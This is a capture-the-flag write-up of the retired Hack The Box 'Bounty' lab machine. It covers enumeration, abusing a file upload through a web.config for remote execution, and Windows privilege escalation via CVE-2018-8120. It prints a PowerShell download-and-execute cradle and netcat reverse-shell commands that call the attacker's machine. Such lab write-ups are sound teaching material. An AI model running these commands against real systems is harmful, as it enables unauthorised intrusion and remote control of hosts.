Hackthebox – Bounty Writeup

This is a writeup for the Bounty machine on hackthebox.eu which was retired on 10/27/18!

We first enumerate ports with:
nmap -sC -sV -Pn 10.10.10.93

Port 80 is open so we go to it and it shows a wizard, nice.

We look around the site and find that the server is Microsoft-IIS/7.5 but that’s not very helpful so we keep looking.

We run gobuster to look for some more directories and pages on the server:
sudo apt-get install gobuster
gobuster -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -u http://10.10.10.93/ -x php,html,txt,dll,aspx,asmx,ashx -s 200,204,301,302,307,403 -t 100 | tee gobuster_bounty3

These 4 results came up:
/UploadedFiles (Status: 301)
/uploadedFiles (Status: 301)
/aspnet_client
/transfer.aspx (Status: 200)

We tried uploading some files but it seems we can only mostly upload image files.

However, to double check, we open Owasp-Zap from the menu of Kali, under the 03-web application analysis menu.

We route our traffic from firefox through the ZAP proxy by setting our traffic in Firefox to go through port 8080 and localhost.

Now we install a module fromn the “Add on” menu called fuzzdb off the marketplace:

We highlight the “png” at the bottom and then press “Add” on the right hand side to add in a list of common extensions.

After running the fuzzer, we see that the 1,110 byte responses are ones that the file upload succeeded on, suggesting we can upload image files and .config files!

By googling around a bit, we found this page that suggests we can get RCE with a .config file!
https://poc-server.com/blog/2018/05/22/rce-by-uploading-a-web-config/

We end up uploading this script to get RCE.
https://pastebin.com/4NBQbKFb

We navigate to 10.10.10.93/uploadedfiles/web.config to find a nice cmd prompt we can use.

We use the command: type c:\users\merlin\desktop\user.txt to get the user flag!

Now to move onto root:

We type the following command on our Kali machine to listen on port 7734:
nc -lvnp 7734

We then download the following reverse shell ps1 file from here.

We added this snippet of code at the very bottom so we don’t have to send over another ps command:
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.5 -Port 7734

Now we open a new cmd prompt and host the file with a simple HTTP server on our Kali machine using:
mkdir /www
cd /www
python -m SimpleHTTPServer 80

We put save the powershell file we just edited in /www as rev.ps1.

We then type the following command into the prompt to send a reverse shell connection back to our Kali machine:
powershell "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.5/rev.ps1')"

Now.. we have a reverse shell.. we type systeminfo to see that it is a 2008 Server R2

So we google for “Windows Server 2008 R2 exploits” and we find an exploit called CVE-2018-8120 to help us get privesc here.

we upload nc64.exe from here to use for the reverse shell, as well as the x64 exploit from CVE-2018-8120 as JPG files, move them over to c:\users\merlin\desktop, and rename them back to .exe files.

We then run the following command in our shell:
& "C:\users\merlin\desktop\x64.exe" "c:\users\merlin\desktop\nc64.exe 10.10.14.5 7735 -e cmd.exe"

(Make sure you are catching with nc -lvnp 7735)

we have the shell! now just type c:\users\administrator\desktop\root.txt and we have the root flag.

Leave a Reply

Your email address will not be published. Required fields are marked *